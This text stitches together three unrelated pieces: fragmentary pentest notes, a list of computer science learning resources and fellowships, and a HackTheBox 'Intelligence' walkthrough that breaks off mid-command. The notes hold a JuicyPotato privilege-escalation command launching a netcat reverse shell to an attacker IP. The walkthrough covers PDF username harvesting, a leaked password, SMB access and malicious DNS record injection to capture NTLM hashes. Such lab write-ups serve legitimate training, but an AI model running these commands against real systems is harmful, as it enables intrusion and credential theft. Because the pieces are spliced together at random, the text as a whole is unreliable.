**4** | [Shankar Bug Hunting Methodology(part 2)](https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150)
**5** | [Recon — my way](https://medium.com/@ehsahil/recon-my-way-82b7e5f62e21)
**6** | [Holdswarth Penetration Testing Methodology(part 1)](https://medium.com/dvlpr/penetration-testing-methodology-part-1-6-recon-9296c4d07c8a)
**7** | [Holdswarth Penetration Testing Methodology (part 2)](https://medium.com/dvlpr/penetration-testing-methodology-part-1-6-recon-9296c4d07c8a)
**8** | [Wired](https://www.wired.com/categoory/threatlevel)
**9** | [Zdnet](https://www.zdnet.com/blog/security)
**11** | [Brain Kerbs](https://krebsonsecurity.com)
**12** |[Bruce Schneier](https://www.schneier.com)
This contains the write-ups from the Internet.
|
### Modifying the raft-small-extensions.txt wordlist from SecLists, removing the dot to avoid Burp from URL-encoding it
```
cp /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-extensions.txt .
sed -i 's/.//' raft-small-extensions.txt
```
### Google "iis config rce"
* https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
* https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config
* https://0xdf.gitlab.io/2018/10/27/htb-bounty.html#transferaspx--uploadedfiles
### windows file transfter
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
`certutil` is available
## Priv
### So simple
`whoami /priv`
### Only worked payload
https://github.com/ohpe/juicy-potato
### Googling how to use the correct payload
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
```
Get-Service # PSH
sc query # CMD
# To get the clsid and replace it
https://github.com/ohpe/juicy-potato/tree/master/CLSID
JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\Windows\temp\nc.exe -e cmd.exe 10.10.x.x 6789" -t *
```
|
# awesome-computer-science-opportunities
An awesome list of events and fellowship opportunities for computer science students
## Contents
- [Learning Platform](#learning-platform)
- [Competitive Programming](#competitive-programming)
- [Web Development](#web-development)
- [Mobile Development](#mobile-development)
- [DevOps](#devops)
- [Data Science](#data-science)
- [Artificial Intelligence](#artificial-intelligence)
- [Computer Science](#computer-science)
- [Open Source](#open-source)
- [Infosec](#infosec)
- [MOOCs](#moocs)
- [Fellowships](#fellowshipsscholarships)
- [Programming Events](#programming-events)
- [Hackathons](#hackathons)
- [General Opportunities](#general-opportunities)
- [Projects](#projects)
## Learning Platform
[Back to Top](#contents)
### Competitive Programming
* [HackerRank](http://hackerrank.com) - Solve code challenges to prepare for programming interviews.
* [HackerEarth](http://hackerearth.com) - Solve code challenges to help companies find innovative solutions for their businesses.
* [CodeChef](http://codechef.com) - Non-profit competitive programming platform.
* [TopCoder](http://topcoder.com) - Participate in code challenges and help solve real world problems.
* [CodeForces](http://codeforces.com) - Russian website dedicated to competitive programming.
* [ProjectEuler](http://projecteuler.net) - Solve computational and mathematical problems using your programming skills.
* [Spoj](http://spoj.com) - Programming contests with online judging system.
* [InterviewBit](https://www.interviewbit.com) - A platform to learn and practice coding interview questions.
* [VisuAlgo](https://visualgo.net/en) - Visualizing data structures and algorithms through animation.
* [LeetCode](https://leetcode.com) - Develop programming skills for your next interview.
* [FireCode](https://www.firecode.io/) - An online coding interview preparation.
* [CodeWars](https://www.codewars.com/) - Code challenges platform to level up your skills.
* [CodinGame](https://www.codingame.com/) - Learn to code by playing games.
* [CodeForces](http://codeforces.com/) - Online platform that hosts competitions and problem sets
* [DailyProgrammer](https://www.reddit.com/r/dailyprogrammer/) - Solutions to programming challenges, peer reviewed with community feedback.
* [CodeFights](https://codefights.com) - Practice programming and land a job.
* [UVa](https://uva.onlinejudge.org) - Programming contests with online judging system.
* [Stanford ACM ICPC](https://github.com/jaehyunp/stanfordacm) - Stanford [Notebook](https://github.com/jaehyunp/stanfordacm/blob/master/notebook.pdf) provides printable templates usable during online/on-site contests.
* [Exercism](http://exercism.io/) - Solve programming challenges from your terminal.
* [DailyCodingProblem](https://www.dailycodingproblem.com/) - Get exceptionally good at coding interviews by solving one problem every day.
* [acmp.ru](http://acmp.ru) - Russian programming contests
* [Timus Online Judge](http://acm.timus.ru/?locale=en) - Programming contests with online judging system.
* [DMOJ: Modern Online Judge](https://dmoj.ca) - contest platform and archive of programming problems
* [Rose Code](https://www.rosecode.net/) - Programming challenges with leaderboards and blog posts
* [Coderbyte](https://coderbyte.com/) - Programming challenges and specific routes to help learn specific skills
* [Code Golf](https://code-golf.io/) - Programming challenges with individual leaderboards for problems
* [Daily Coding Problem](https://www.dailycodingproblem.com/) - Get emailed a new coding problem every day
* [Halite](https://halite.io/) - Create AI to face off against other people's AI. More specialized on AI
* [Advent of Code](https://adventofcode.com/) - A yearly set of coding challenges that published with leaderboards
* [StopStalk](https://www.stopstalk.com/) - A tool to analyse and improve your Competitive Programming Progress
### Web Development
* [Learn Enough to Be Dangerous](https://www.learnenough.com/) - Free online coding tutorials on JavaScript, Ruby, Rails, CSS and more.
* [FreeCodeCamp](http://freecodecamp.com) - Coding tutorials and challenges.
* [Thimble](https://thimble.mozilla.org/en-US/) - Free online code editor, web server, web browser & developer tools.
* [NodeSchool](https://nodeschool.io) - Open source workshops that teach web software skills.
* [The Odin Project](https://www.theodinproject.com/) - A full free open source coding curriculum.
* [Egghead](https://egghead.io/) - Video tutorials on popular JavaScript frameworks.
* [Codecademy](https://www.codecademy.com/) - Free and premium interactive tutorials for various languages.
* [CodeSchool](https://www.codeschool.com/) - Combination of video and interactive tutorials.
* [MDN web docs](https://developer.mozilla.org/en-US/docs/Learn) - Web development articles by Mozilla.
* [W3Schools](https://www.w3schools.com/) - Tutorials on HTML, CSS, JavaScript and more.
* [Eloquent JavaScript](http://eloquentjavascript.net/) - An online book about JavaScript.
* [Coder-Coder](https://www.coder-coder.com/) - Tutorials on Web Development from basics including HTML, CSS, JavaScript and more.
* [CodeCraft](https://codecraft.tv/) - Provide Web Development Courses on JavaScript, AngularJS, Angular 5 for free.
* [Scrimba](https://scrimba.com/) - Provides Web Development Courses with a unique feature of live interaction with the instructor's code.
* [FrontendMasters](https://frontendmasters.com/) - In-depth and advanced video tutorials on Frontend Devlopment from experts in the industry.
* [MiguelGrinberg](https://blog.miguelgrinberg.com/) - In-depth and beginner friendly tutorial on using Flask with an interesting sample project.
### Mobile Development
* [Udacity Android Nanodegree](https://in.udacity.com/course/android-developer-nanodegree-by-google--nd801) - Students can also apply for [scholarship](https://in.udacity.com/google-india-scholarships) given by Google.
* [Android Developer Training](https://developers.google.com/training/android/) - Range of courses to help you build Android apps.
* [Vogella](http://www.vogella.com/tutorials/android.html) - Tutorials about Android development.
* [Android Hive](https://www.androidhive.info) - Android tutorials blog.
* [iOS development](https://in.udacity.com/course/intro-to-ios-app-development-with-swift--ud585) - Build your first iOS app with an Udacity course.
### DevOps
* [DevOps Bootcamp](http://devopsbootcamp.osuosl.org/start-here.html) - Course dedicated to teach core software development and systems operation skills.
* [Google IT Support Course](https://www.coursera.org/specializations/google-it-support) - Google course to prepare you for a job in IT support.
### Data Science
* [Kaggle](http://kaggle.com) - Data science competitive platform.
* [DataQuest](http://dataquest.io) - Learn data science with your browser.
* [DataCamp](http://datacamp.com) - Learn data science online.
* [DrivenData](https://www.drivendata.org/) - Participate in data science competitions and help organizations.
* [Analytics Vidhya](http://analyticsvidhya.com) - Training and Q&A platform based around data science.
* [fast.ai](http://course.fast.ai/) - Deep Learning with only prerequisite being general coding skills.
* [TunedIT](http://tunedit.org/data-competitions) - Data Mining competitions.
* [Data Science Central](https://www.datasciencecentral.com/) - the online resource for big data practitioners.
* [KPMG Data Science Virtual Internship](https://www.insidesherpa.com/virtual-internships/theme/m7W4GMqeT3bh9Nb2c/KPMG-Data-Analytics-Virtual-Internship) - learn data science from a Big 4 accounting firm and how it's used in industry.
### Artificial Intelligence
* [Siraj Raval](https://www.youtube.com/channel/UCWN3xxRkmTPmbKwht9FuE5A) - YouTube channel with tutorials about AI.
* [Sentdex](https://www.youtube.com/user/sentdex) - YouTube channel with programming tutorials.
* [Two Minute Papers](https://www.youtube.com/user/keeroyz) - Learn AI with 5 mins videos.
* [Andrej Karpathy](http://karpathy.github.io/) - Old blog about AI, now posting on [Medium](https://medium.com/@karpathy/).
* [iamtrask](http://iamtrask.github.io/) - Machine Learning blog.
* [colah's blog](http://colah.github.io/) - Blog about neural networks.
* [Google Machine Learning Course](https://developers.google.com/machine-learning/crash-course) - A crash course of machine learning taught by Google Engineers
* [Google AI](https://ai.google/education/)- Learn from ML experts at Google
### Computer Science
* [BaseCS](https://medium.com/basecs) - Explains computer science basics in easy-to-digest articles. Also in [podcast](https://www.codenewbie.org/basecs) format.
* [Tutorials Point](http://tutorialspoint.com) - tutorials for technologies like web, mobile and many more.
* [Introduction to Computer Science - CS101](https://classroom.udacity.com/courses/cs101/) - introduction to computer science in python language.
### Open Source
* [Up For Grabs](http://up-for-grabs.net/#/) - Start exploring open source projects and get involved in them.
* [24 Pull Requests](https://24pullrequests.com) - Yearly initiative to encourage developers to send 24 pull requests during December.
* [HacktoberFest](https://hacktoberfest.digitalocean.com) - Similar to 24PullRequests, gives swag for 4 accepted pull requests.
* [OpenHatch](https://openhatch.org/search/) - Non-profit providing tools for new open source contributors.
* [First Timers Only](http://www.firsttimersonly.com) - Beginners-friendly open source projects.
* [Your First PR](http://yourfirstpr.github.io/) - Helps you make a contribution by showcasing great starter issues on Github.
* [Awesome For Beginners](https://github.com/MunGell/awesome-for-beginners) - A list of awesome beginners-friendly projects.
* [CodeTriage](https://www.codetriage.com/) - Pick your favorite projects to receive a different issue in your inbox every day.
* [Open Source Friday](https://opensourcefriday.com/) - Helps you find a project to contribute to.
## Infosec
__How to start? - blogs__
* [Beginner Bug Bounty Hunters resources](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters)- Collection of resources to build up the basics of Web Application Security
* [Getting Started in Bug Bounty Hunting](https://whoami.securitybreached.org/2019/06/03/guide-getting-started-in-bug-bounty-hunting/) - What You Should Know Before Starting to learn about Bug Bounty Hunting?
* [Getting started in Bug Bounty](https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a) - How to get started in Bug Bounties
* [How to get started with bug Bounty?](https://medium.com/@unknownuser1806/what-i-have-learn-in-my-first-month-of-hacking-and-bug-bounty-dc1a4be58294) - What you need to learn before getting started with bug bounty
* [METHODOLOGY , TOOLKIT , TIPS & TRICKS](https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65) - A complete bug bounty blog for beginners
__Recon__
* [Recon - by Sahil Ahamad](https://medium.com/@ehsahil/recon-my-way-82b7e5f62e21) - Blog post on reconnaissance processes for web applications security testing
* [Recon - by Adrien](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d) - What tools I use for my recon during Bug Bounty
## MOOCs
[Back to Top](#contents)
* [Udacity](http://udacity.com) - Free and paid online classes.
* [Coursera](http://coursera.org) - Courses from schools and universities like Stanford and Yale.
* [Udemy](http://udemy.com) - Online learning and teaching platform.
* [edX](https://www.edx.org) - Free online courses from institutions like Harvard, MIT, Microsoft and more.
* [Codecademy](https://www.codecademy.com/) - Online learning platform for coding.
* [MIT OPENCOURSEWARE](https://ocw.mit.edu/courses/find-by-department/) - Browse and learn with free MIT courses' material.
* [Microsoft Virtual Academy](https://mva.microsoft.com) - Free courses on IT basic concepts and Microsoft products and services.
* [Awesome Courses](https://github.com/prakhar1989/awesome-courses) - List of awesome university courses for learning Computer Science.
* [Lynda](https://www.lynda.com) - Online learning platform.
* [Stanford Online](https://online.stanford.edu/courses) - Stanford's courses platform.
* [Pluralsight](https://www.pluralsight.com/) - Paid learning platform made to help you build your career or land a job.
* [Khan Academy](https://www.khanacademy.org/) - Free online learning platform.
* [Sololearn](https://www.sololearn.com/) - Learn coding from the ground up for free!! (also available on android)
* [Y Combinator](https://www.insidesherpa.com/virtual-internships/prototype/oRMogWRHeewqHzA7u/College-students%3A-Learn-how-to-work-at-a-YC-startup-) - Learn how engineering works at a Y Combinator startup
* [MOOC.fi](https://www.mooc.fi/en) - Free courses from the University of Helsinki's Department of Computer Science.
## Fellowships/Scholarships
[Back to Top](#contents)
* [Developer Scholarship from Google](https://in.udacity.com/google-india-scholarships) - Link for Indian students (Others click [here](https://www.udacity.com/scholarships)).
* [Scholarship Opportunities at Google](https://edu.google.com/scholarships/) - Google's scholarship opportunities.
* [Microsoft Scholarship Program](https://careers.microsoft.com/students/scholarships) - For students at US/Canada/Mexico only.
* [Fellowships at Microsoft Research Asia](https://www.microsoft.com/en-us/research/academic-program/fellowships-microsoft-research-asia/) - For students in mainland China, Hong Kong, Japan, Korea, Singapore, or Taiwan.
* [IBM PhD Fellowship](https://www.research.ibm.com/university/awards/fellowships.html) - For students who want to make their mark in promising and disruptive technologies.
* [Thiel Fellowship for young innovators](http://thielfellowship.org) - Intended for students under 23yo and offers a total of $100,000 and guidance to drop out of school and pursue other work.
* [The Facebook Fellowship Program](https://research.fb.com/programs/fellowship/) - Designed to encourage promising doctoral students who are engaged in areas related to computer science.
* [NVIDIA Graduate Fellowships](http://research.nvidia.com/graduate-fellowships) - Fellowship for AI,ML students.
* [S.N. Bose Scholars Program](http://iusstf.org/story/53-74-For-Indian-Students.html) - For Indian Students.
* [Richard E. Merwin Student Scholarship](https://www.computer.org/web/students/merwin) - For IEEE members.
* [The Data Science for Social Good Fellowship](https://dssg.uchicago.edu) - It is a University of Chicago summer program to train aspiring data scientists to work on data mining, machine learning, big data, and data science projects with social impact.
* [The Data Incubator](https://www.thedataincubator.com) - The Data Incubator is an 8-week educational fellowship preparing students with Master's degrees and PhDs for careers in big data and data science.
* [Kleiner Perkins Fellow - Engineering](http://fellows.kleinerperkins.com) - Kleiner Perkins Fellows program matches accepted fellows up with their partnering Silicon Valley startups over the summer.
* [Cern Openlab Summer Student Programme](https://openlab.cern/education) - CERN openlab is a 2 month long student program where students complete assigned projects with CERN members during the summer.
* [HackNY Fellow](https://apply.hackny.org/) - Fellowship that matches students with New York City Startups
* [Adobe India Women-in-Technology Scholarship](https://research.adobe.com/adobe-india-women-in-technology-scholarship/) - Adobe Scholarship for encouraging women to showcase their excellence in computing and technology.
* [Grace Hopper Scholarship](https://www.gracehopper-gitusc.com/#!) - A Scholarship by USC Girls in Tech.
* [WeTech Qualcomm Global Scholarship](https://www.iie.org/Programs/WeTech/STEM-Scholarships-for-Women/Qualcomm-Global-Scholars-Program) - A scholarship for women in technology by Qualcomm and IIE.
* [Emeritus fellowship](https://www.ugc.ac.in/ef/) - For the superannuated teachers.
* [Junior research fellowship in science, humanities and social science](https://www.ugc.ac.in/oldpdf/xplanpdf/JRFscience.pdf) - It is for qualifiers of UGC and UGC-CSIR tests.
* [UGC research fellowships in science for meritorious students](https://www.ugc.ac.in/oldpdf/xiplanpdf/meritorious%20students.pdf) - It is to promote quality research in University/Departments.
* [Junior research fellowship in engineering and technology](https://www.ugc.ac.in/oldpdf/xiplanpdf/JRFE-T.pdf) - It is for those who wish to pursue Ph.D. degree in engineering and technology.
* [Swarnajayanti fellowships scheme](https://dst.gov.in/scientific-programmes/scientific-engineering-research/human-resource-development-and-nurturing-young-talent-swarnajayanti-fellowships-scheme) - For providing special assistance and support to talented young scientist.
* [MLH Fellowship](https://fellowship.mlh.io/programs/explorer) - The MLH Fellowship helps software engineers level up
## Programming Events
[Back to Top](#contents)
* [Google Summer of Code](https://summerofcode.withgoogle.com) - A global program focused on bringing more student developers into open source software development.
* [Google CodeJam](https://codingcompetitions.withgoogle.com/codejam) - Google’s largest coding competition.
* [Google Kickstart](https://codingcompetitions.withgoogle.com/kickstart) - Many online rounds to give students the opportunity to develop their coding skills and pursue a career at Google.
* [Google HashCode](https://hashcode.withgoogle.com) - Programming competition organized by Google for students and industry professionals across Europe, the Middle East and Africa.
* [Google Code-in](https://codein.withgoogle.com/) - A competition for pre-university students(13 to 17 years old) to introduce themselves to the world of open source by doing small tasks for various open source projects.
* [ACM-ICPC](https://icpc.baylor.edu/) - The International Collegiate Programming Contest is an algorithmic programming contest for college students.
* [Facebook HackerCup](https://www.facebook.com/hackercup/) - Annual programming contest organized by Facebook.
* [List of Open Source Internship Programs](https://github.com/tapasweni-pathak/SOC-Programs) - Includes [Rails Girls Summer of Code](https://railsgirlssummerofcode.org/) and [Outreachy](https://www.outreachy.org/).
* [Hactoberfest](https://hacktoberfest.digitalocean.com) - Organized by Digital Ocean in October.
* [IEEEXtreme](https://ieeextreme.org) - Annual 24 hour long team contest for IEEE members.
## Hackathons
[Back to Top](#contents)
* [Devpost](http://devpost.com/hackathons) - Online or in-person hackathons browsing platform.
* [hackathon.io](http://hackathon.io) - Browse in-person hackathons.
* [Hackalist](https://www.hackalist.org) - List of upcoming hackathons.
* [AngelHack](https://angelhack.com) - Hackathon planning organization.
* [Hackevents](https://hackevents.co/hackathons) - Hackathons search engine.
* [Yelp Dataset Challenge](https://www.yelp.com/dataset/challenge) - The challenge is a chance for students to conduct research or analysis on our data and share their discoveries with Yelp.
* [hack.summit()](https://www.crowdcast.io/hack_summit) - Virtual conference where you can learn from the world's most renowned programmers.
* [Major League Hacking Event Page](https://mlh.io/) - A list of a ton of events that are sponsored by the official hackathon league
* [Microsoft Imagine Cup](https://imaginecup.microsoft.com/en-us/Events?id=0)-Bring your tech idea to life with the Imagine Cup and make a difference through creativity, collaboration, and competition.
## General Opportunities
[Back to Top](#contents)
* [Github Student Pack](https://education.github.com/pack) - Get free access to the best developer tools in one place.
* [Visual Studio Dev Essentials](https://www.visualstudio.com/dev-essentials/) - Free learning resources and programming tools.
## Projects
[Back to Top](#contents)
* [CodeCrafters](https://app.codecrafters.io/tracks?r=2ay) — Recreate popular technologies from scratch, in any language. e.g Build your own Git, Docker, Redis, etc.
* [Community Driven Demo Projects](https://www.crio.do/projects/) - Find interesting mini projects for CSE and get started with an execution plan
|
# Intelligence - HackTheBox - Writeup
Windows, 30 Base Points, Hard
![info.JPG](images/info.JPG)
## Machine
![Intelligence.JPG](images/Intelligence.JPG)
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```53```, ```80```,```88```,```88```,```135```,```139```,```445```,```464```,```593```,```636``` and ```3629```.
***User 1***: Discovering PDF's with filenames based upon the date, Building a customized wordlist based upon the date, Downloading the PDF's with ```python``` script and then examining users, Finding the password ```NewIntelligenceCorpUser987``` which is the password of ```Tiffany.Molina```.
***User 2***: Found PowerShell script ```downdetector.ps1``` which is scheduled a DNS request for each 5 min, Using ```Responder``` we found the NTLMv2 hash of ```Ted.Graves```.
***User 3***: Importing the ```bloodhound``` results for attack paths - Discovering we probably need to get access to the ```SVC_INT``` GMSA (Group Managed Service Account).
***Root***: Using impacket's ```getST``` to generate a SilverTicket which we can use for impersonating an Administrator, Using our ticket with ```psexec``` to gain access to the server as Administrator.
![pwn.JPG](images/pwn.JPG)
## Intelligence Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ nmap -sC -sV -oA nmap/Intelligence 10.10.10.248
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-02 22:48 IDT
Nmap scan report for 10.10.10.248
Host is up (0.069s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-03 02:53:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-03T02:56:19+00:00; +7h04m30s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-03T02:56:20+00:00; +7h04m29s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-03T02:56:19+00:00; +7h04m30s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/2%Time=61084C25%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h04m29s, deviation: 0s, median: 7h04m28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-03T02:55:41
|_ start_date: N/A
```
By observing port 80 [http://10.10.10.248/](http://10.10.10.248/) we get the following web page:
![port80.JPG](images/port80.JPG)
If we clicked on Download documents:
![documents.JPG](images/documents.JPG)
We get two pdf files called ```2020-01-01-upload.pdf``` and ```2020-12-15-upload.pdf```.
By running ```exiftool``` on those files we get can see the following creators (users):
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ exiftool *.pdf | grep Creator
Creator : William.Lee
Creator : Jose.Williams
```
It's mean we can get users from pdf files, The pdf files name is ```yyyy-dd-mm-upload.pdf```, Let's write python code to retrieve all documents by dates as follow:
```python
import datetime
import urllib
from urllib.parse import parse_qsl, urljoin, urlparse
import urllib.request
from dateutil import parser
base=parser.parse("2020-01-01")
for i in range(365):
next=base + datetime.timedelta(days=i)
doc_name=next.strftime('%Y-%d-%m-upload') + ".pdf"
url=urljoin('http://10.10.10.248/documents/', doc_name)
try:
urllib.request.urlretrieve(url, doc_name)
print(f"Successfully downloaded {doc_name}")
except:
pass
```
By running the script we get:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ python3 get_documents.py
Successfully downloaded 2020-01-01-upload.pdf
Successfully downloaded 2020-05-01-upload.pdf
Successfully downloaded 2020-08-01-upload.pdf
Successfully downloaded 2020-11-01-upload.pdf
Successfully downloaded 2020-01-02-upload.pdf
Successfully downloaded 2020-04-02-upload.pdf
Successfully downloaded 2020-06-02-upload.pdf
Successfully downloaded 2020-07-02-upload.pdf
Successfully downloaded 2020-09-02-upload.pdf
Successfully downloaded 2020-05-03-upload.pdf
Successfully downloaded 2020-06-03-upload.pdf
Successfully downloaded 2020-08-03-upload.pdf
Successfully downloaded 2020-11-03-upload.pdf
Successfully downloaded 2020-01-04-upload.pdf
Successfully downloaded 2020-03-04-upload.pdf
Successfully downloaded 2020-04-04-upload.pdf
Successfully downloaded 2020-06-04-upload.pdf
Successfully downloaded 2020-09-04-upload.pdf
Successfully downloaded 2020-03-05-upload.pdf
Successfully downloaded 2020-09-05-upload.pdf
Successfully downloaded 2020-10-05-upload.pdf
Successfully downloaded 2020-07-06-upload.pdf
Successfully downloaded 2020-09-06-upload.pdf
Successfully downloaded 2020-11-06-upload.pdf
Successfully downloaded 2020-05-07-upload.pdf
Successfully downloaded 2020-06-07-upload.pdf
Successfully downloaded 2020-06-08-upload.pdf
Successfully downloaded 2020-07-08-upload.pdf
Successfully downloaded 2020-08-09-upload.pdf
Successfully downloaded 2020-01-10-upload.pdf
Successfully downloaded 2020-11-10-upload.pdf
Successfully downloaded 2020-12-10-upload.pdf
Successfully downloaded 2020-02-11-upload.pdf
Successfully downloaded 2020-05-11-upload.pdf
Successfully downloaded 2020-09-11-upload.pdf
Successfully downloaded 2020-11-11-upload.pdf
Successfully downloaded 2020-03-12-upload.pdf
Successfully downloaded 2020-06-12-upload.pdf
```
Now, Let's get all users from those pdf files to file ```users```:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ exiftool *.pdf | grep Creator | cut -d ':' -f2 | cut -d ' ' -f 2
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
Jose.Williams
Brian.Morris
Jennifer.Thomas
Thomas.Valenzuela
David.Mcbride
Jose.Williams
Anita.Roberts
Brian.Baker
Jose.Williams
David.Mcbride
David.Reed
Kaitlyn.Zimmerman
Jason.Patterson
Thomas.Valenzuela
David.Mcbride
Darryl.Harris
David.Wilson
Scott.Scott
Teresa.Williamson
John.Coleman
Samuel.Richardson
Ian.Duncan
Jason.Wright
Travis.Evans
David.Mcbride
Jessica.Moody
Ian.Duncan
Anita.Roberts
Kaitlyn.Zimmerman
Jose.Williams
Stephanie.Young
Samuel.Richardson
Tiffany.Molina
Ian.Duncan
```
By reading all pdf's we can see pdf ```2020-06-04-upload.pdf``` which contains password:
![2020-06-04-upload.JPG](images/2020-06-04-upload.JPG)
By enumerating ```smbclient``` we can find that the password from pdf ```NewIntelligenceCorpUser9876``` works with the user ```Tiffany.Molina```.
Let's use those credentials:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ smbclient -U Tiffany.Molina -L 10.10.10.248
Enter WORKGROUP\Tiffany.Molina's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
```
By accessing to ```Users``` share we can get the user flag:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ smbclient -U Tiffany.Molina \\\\10.10.10.248\\Users
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Mon Apr 19 04:20:26 2021
.. DR 0 Mon Apr 19 04:20:26 2021
Administrator D 0 Mon Apr 19 03:18:39 2021
All Users DHSrn 0 Sat Sep 15 10:21:46 2018
Default DHR 0 Mon Apr 19 05:17:40 2021
Default User DHSrn 0 Sat Sep 15 10:21:46 2018
desktop.ini AHS 174 Sat Sep 15 10:11:27 2018
Public DR 0 Mon Apr 19 03:18:39 2021
Ted.Graves D 0 Mon Apr 19 04:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 03:51:46 2021
3770367 blocks of size 4096. 1449246 blocks available
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\>
```
The user flag is ```987c02776352197052e9c29d365ae2f8```.
### User 2
By enumerating ```IT``` share we can see the following PowerShell script:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ smbclient \\\\10.10.10.248\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Apr 19 03:50:55 2021
.. D 0 Mon Apr 19 03:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 03:50:55 2021
3770367 blocks of size 4096. 1462029 blocks available
smb: \>
```
The script contains the following:
```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
```
As we can see, It's make request to Active Directory ```"AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")``` to get all DNS records starts with ```web*```.
By using the following article [https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/](https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/) we can use script called [dnstool.py](https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py).
The ```dnstool.py``` utility has several options, including one to add/modify records, and that's exactly what we need.
Let's add a new entry to DNS records ```webabc.intelligence.htb``` and point it to our host as DNS server as follow:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence/krbrelayx]
└──╼ $ python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -r webabc.intelligence.htb -d 10.10.14.14 --action add --allow-multiple 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```
As we can see the script is scheduled to run every 5 min, Let's run ```responder``` to create a DNS server and after a few minutes we get the following DNS request:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ sudo responder -I tun0
